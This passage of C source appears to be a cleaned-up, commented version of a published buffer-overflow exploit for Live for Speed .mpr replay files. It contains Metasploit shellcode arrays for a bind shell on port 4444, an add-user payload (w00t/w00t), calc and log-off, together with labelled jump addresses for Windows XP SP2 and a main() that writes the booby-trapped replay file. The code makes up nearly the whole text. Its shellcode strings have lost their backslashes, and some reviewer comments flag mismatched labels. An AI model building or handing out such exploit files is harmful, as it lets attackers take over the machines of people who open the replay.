"x63x87x4axd1x24x73xe1x8bx3bxabx9ax5cx23x32x5bxe5"
"xfcx3bxb5x43xfcx13x5cx06x66xf5xc9xb5x0bx70xecx50"
"x84xdbxc6x68xadx3cx72x35x27x20xb2x75xc4x0ex4bx37"
"x06xb0xf6x94xcbxc1x8dxdcx40x72xdax75xe5x7axaex90"
"xf6xf7x95x63xdexacx42xcex8ex03x3cx84x31xf2xefx0d"
"x63x0bxdfxc6x2ex2axe5xd8x62x33x30x8ex7bx34x8axb0"
"x54x41xa2xb2xd6x91x29xb4x0fx4bx4dx9axd8x9bx3bx1f"
"x46x08xc3xf6x87x7ex3bxf7x77x7ex3cxf7x77";
//win32 bind shell on port 4444 http://metasploit.com
// Payload array written (sizeof-1 bytes) when the second menu in main() is
// answered with 2, which main() labels "Execute calc.exe shell code".
// NOTE(review): the variable name and menu label say calc.exe while the
// comment above says bind shell; the comment on the `shellcode` array above
// has the reverse mismatch, so the two comments are probably swapped.
char calc_shellcode[]=
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54"
"x42x50x42x50x42x30x4bx58x45x54x4ex33x4bx38x4ex57"
"x45x30x4ax37x41x30x4fx4ex4bx58x4fx44x4ax41x4bx38"
"x4fx35x42x42x41x30x4bx4ex49x34x4bx58x46x33x4bx58"
"x41x30x50x4ex41x33x42x4cx49x39x4ex4ax46x58x42x4c"
"x46x37x47x30x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e"
"x46x4fx4bx53x46x55x46x32x46x30x45x47x45x4ex4bx48"
"x4fx35x46x32x41x50x4bx4ex48x36x4bx58x4ex50x4bx54"
"x4bx58x4fx35x4ex31x41x50x4bx4ex4bx38x4ex41x4bx38"
"x41x30x4bx4ex49x38x4ex45x46x52x46x50x43x4cx41x53"
"x42x4cx46x46x4bx48x42x44x42x43x45x38x42x4cx4ax37"
"x4ex50x4bx48x42x44x4ex50x4bx48x42x57x4ex51x4dx4a"
"x4bx48x4ax46x4ax30x4bx4ex49x30x4bx58x42x58x42x4b"
"x42x30x42x50x42x30x4bx48x4ax46x4ex43x4fx55x41x43"
"x48x4fx42x56x48x55x49x58x4ax4fx43x38x42x4cx4bx57"
"x42x55x4ax46x4fx4ex50x4cx42x4ex42x46x4ax36x4ax49"
"x50x4fx4cx48x50x30x47x35x4fx4fx47x4ex43x46x41x56"
"x4ex46x43x56x50x42x45x56x4ax37x45x36x42x30x5a";
// win32_adduser PASS=w00t EXITFUNC=seh USER=w00t http://metasploit.com
// Payload array written (sizeof-1 bytes) when the second menu in main() is
// answered with 3 ("Add user shell code PASS=w00t USER=w00t"); the menu
// label and this comment agree.
char adduser_shellcode[]=
"xfcxbbxfbxe2x33x0bxebx0cx5ex56x31x1exadx01xc3x85"
"xc0x75xf7xc3xe8xefxffxffxffx07x0ax77x0bxf7xcbxf3"
"x4excbx40x7fx54x4bx56x6fxddxe4x40xe4xbdxdax71x11"
"x08x91x46x6ex8ax4bx97xb0x14x3fx5cxf0x53x38x9cx3b"
"x96x47xdcx57x5dx7cxb4x83x9axf7xd1x47xfdxd3x18xb3"
"x64x90x17x08xe2xf9x3bx8fx1fx8ex58x04xdex7bxe9x46"
"xc5x7fx29x47xc5x1bx26xe8xf5x66xf8x91xf9xe3xb9x6d"
"x89x83x25xc3x06x0bx5exf0x10x40xdexb6x23x56xdfx3d"
"x4bx6ax80x70x7axf2x68xfax7ax71x54x87x2ax1dxa5xf2"
"xcfx82x2dx9bx2exb6xa0xccx31x21xdfx9fxa9x83x45x18"
"x57xfbxaaxbbxb7x95xd1x4fx98x1cx69xd5xaaxfexfax25"
"x7bx8ax24x31x4bx42x51x9dx84xe3xddx99xfaxc5xfbx01"
"x95x6cx70x62x05x01x1bx03xb9xbaxa9xacx34x34x6ex72"
"xd3xd9x07x1ax72x52xacx90xe5xe0x23x27x95x28xcbxf7"
"x69x5cx13xd7xc8xd8x17x27xcbxe0x97x27xcb";
//Log user off shell code http://metasploit.com
// Payload array written (sizeof-1 bytes) when the second menu in main() is
// answered with 4, which main() labels "Shut down user's computer".
// NOTE(review): "log off" (this comment) and "shut down" (the menu) are not
// the same action; which one this array performs is not verified here.
char Log_off_shellcode[]=
"xfcxbbx25x48xf4xb3xebx0cx5ex56x31x1exadx01xc3x85"
"xc0x75xf7xc3xe8xefxffxffxffxd9xa0xb0xb3x21x31xb2"
"xf1x1dxbaxb8xfcx25xbdxafx74x9axa5xa4xd4x04xd7x51"
"xa3xcfxe3x2ex35x21x3axf1xafx11xb9x31xbbx6ex03x7b"
"x49x71x41x97xa6x4ax11x4cx43xd9x7cx07x14x05x7exf3"
"xcdxcex8cx48x99x8fx90x4fx76xa4xb5xc4x89x51x4cx86"
"xadxa1x8cx06x6excdx99x29x5ex88x5exd1x92x19x1ex2e"
"x20x6dx83x83xbdxe5xb3x30xc8x7ex43x76xcbx80x44xfc"
"xa4xbcx1bx33xc3xdcxf5xbaxd3x9fx3axc7x73xf7x4axb2"
"x70x58xc3x5bx86xecx1dx0bx88x17x52xdbx03xa3xf1x74"
"x9bx25xdaxa7x0fx99x37xccxefxe9x77x2cxf0x09x78x2c"
"xf0";
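/* Lengths of the two filler runs written around the chosen address string and
 * payload array; taken verbatim from the original loops (38 'A's, 353 'B's). */
enum { PAD_A_LEN = 38, PAD_B_LEN = 353 };

/* Write n bytes of buf to f. Returns 0 on success, -1 on a short write. */
static int write_bytes(FILE *f, const void *buf, size_t n)
{
    return fwrite(buf, 1, n, f) == n ? 0 : -1;
}

/* Write the byte ch to f n times. Returns 0 on success, -1 on a write error. */
static int write_fill(FILE *f, int ch, size_t n)
{
    for (size_t k = 0; k < n; k++) {
        if (fputc(ch, f) == EOF) {
            return -1;
        }
    }
    return 0;
}

/* Read one integer menu choice from stdin and discard the rest of the line.
 * Returns the number read, or -1 when the input was not a number; the
 * original never checked scanf() and switched on an uninitialized int. */
static int read_choice(void)
{
    int choice = 0;
    int matched = scanf("%d", &choice);
    int c;
    while ((c = getchar()) != '\n' && c != EOF) {
        /* drop the remainder of the line so a bad token is not re-read */
    }
    return matched == 1 ? choice : -1;
}

/* Cancel/failure path: close f, delete the partially written Mpr_file so no
 * truncated output is left on disk, and return main()'s failure status. */
static int discard_output(FILE *f)
{
    fclose(f);
    remove(Mpr_file);
    return 1;
}

/*
 * Entry point. Interactively assembles Mpr_file from the arrays declared
 * above, in this order (unchanged from the original): file_header1,
 * PAD_A_LEN 'A' bytes, the address string picked in the first menu, the
 * payload array picked in the second menu, PAD_B_LEN 'B' bytes, file_header2.
 *
 * Returns 0 when the file was fully written and closed, 1 otherwise (cannot
 * open, cancelled or unrecognised menu input, short write, fclose error).
 * Every failure after fopen removes the partial file; the original exit(0)
 * paths left a truncated file behind and reported success to the shell.
 */
int main(void)
{
    FILE *out = fopen(Mpr_file, "wb");
    if (out == NULL) {
        printf("fuck We are Unable to build the file %s", Mpr_file);
        putchar('\n');
        perror("fopen");        /* say why, not just that it failed */
        return 1;
    }

    system("cls");
    printf("n *************************************************");
    printf("n *Live for speed .mpr local file buffer overflow *");
    printf("n *************************************************");
    printf("n * Special thanks to Str0ke *");
    printf("n *************************************************");
    printf("n * Shout's ~ str0ke ~ c0ntex ~ marsu ~v9@fakehalo*");
    printf("n * Date : August 1 2007 *");
    printf("n *************************************************");
    printf("n * Creating .Mpr replay File please wait !! *");
    printf("n *************************************************");
    Sleep(4000);
    system("cls");

    /* sizeof-1 skips the string terminator, as the original fputc loop did */
    if (write_bytes(out, file_header1, sizeof file_header1 - 1) != 0 ||
        write_fill(out, 'A', PAD_A_LEN) != 0) {
        return discard_output(out);
    }

    printf( "[1]. English Jmp_esp win xp sp2 n" );
    printf( "[2]. French Call_esp win xp sp2 n" );
    printf( "[3]. German Jmp_esp win xp sp2 n" );
    printf( "[4]. To exit and canceln" );
    printf( "Pick your jmp esp: " );
    const char *address = NULL;
    switch (read_choice()) {
    case 1:
        address = JMP_ESP_English;
        break;
    case 2:
        address = CALL_ESP_French;
        break;
    case 3:
        address = JMP_ESP_German;
        break;
    case 4:   /* explicit cancel */
    default:  /* anything else: the original silently wrote no address at all */
        return discard_output(out);
    }
    /* fputs() writes the string without its terminator, exactly as before.
     * (The original had a Sleep(500) after the last break of this switch;
     * it was unreachable and has been dropped.) */
    if (fputs(address, out) == EOF) {
        return discard_output(out);
    }

    system("cls");
    printf( "[1].Bind to port shell code port 4444n");
    printf( "[2].Execute calc.exe shell coden");
    printf( "[3].Add user shell code PASS=w00t USER=w00tn");
    printf( "[4].Shut down user's computern");
    printf( "[5].To exit and canceln" );
    printf( "Pick your shell code: " );
    const char *payload = NULL;
    size_t payload_len = 0;
    switch (read_choice()) {
    case 1:
        payload = shellcode;
        payload_len = sizeof shellcode - 1;
        break;
    case 2:
        payload = calc_shellcode;
        payload_len = sizeof calc_shellcode - 1;
        break;
    case 3:
        payload = adduser_shellcode;
        payload_len = sizeof adduser_shellcode - 1;
        break;
    case 4:
        payload = Log_off_shellcode;
        payload_len = sizeof Log_off_shellcode - 1;
        break;
    case 5:   /* explicit cancel */
    default:  /* unrecognised input: original wrote no payload and went on */
        return discard_output(out);
    }
    if (write_bytes(out, payload, payload_len) != 0) {
        return discard_output(out);
    }
    Sleep(500);

    if (write_fill(out, 'B', PAD_B_LEN) != 0 ||
        write_bytes(out, file_header2, sizeof file_header2 - 1) != 0) {
        return discard_output(out);
    }
    /* fclose() flushes the stdio buffer; a failure here means the file on
     * disk is incomplete, so treat it like any other write error. */
    if (fclose(out) != 0) {
        perror("fclose");
        remove(Mpr_file);
        return 1;
    }

    system("cls");
    printf("%s successfully created..n",Mpr_file);
    printf("%s n",Credits_to);
    Sleep(3000);
    return 0;
}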